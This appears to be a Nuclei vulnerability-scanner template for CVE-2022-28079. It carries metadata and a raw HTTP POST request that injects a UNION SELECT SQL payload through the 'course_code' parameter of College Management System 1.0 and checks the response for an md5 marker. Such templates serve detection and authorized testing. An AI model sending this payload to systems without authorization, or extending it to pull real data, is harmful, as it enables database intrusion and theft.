nuclei-templates/http/cves/2022/CVE-2022-28079.yaml

54 lines
2.0 KiB
YAML

id: CVE-2022-28079
info:
name: College Management System 1.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
- https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
- https://nvd.nist.gov/vuln/detail/CVE-2022-28079
- https://code-projects.org/college-management-system-in-php-with-source-code/
- https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-28079
cwe-id: CWE-89
epss-score: 0.68173
epss-percentile: 0.97965
cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: college_management_system_project
product: college_management_system
tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project
variables:
num: "999999999"
http:
- raw:
- |
POST /admin/asign-single-student-subjects.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
- type: status
status:
- 302
# digest: 4b0a00483046022100f1785587cac15cd8858bff3c9e18d1cd6abb152301f1ac7f776e5e73c988ed3d02210083e743db669b0cf972fbdb7c27f1c4356e475b32c7ab382254bbe138d7516aa2:922c64590222798bb761d5b6d8e72950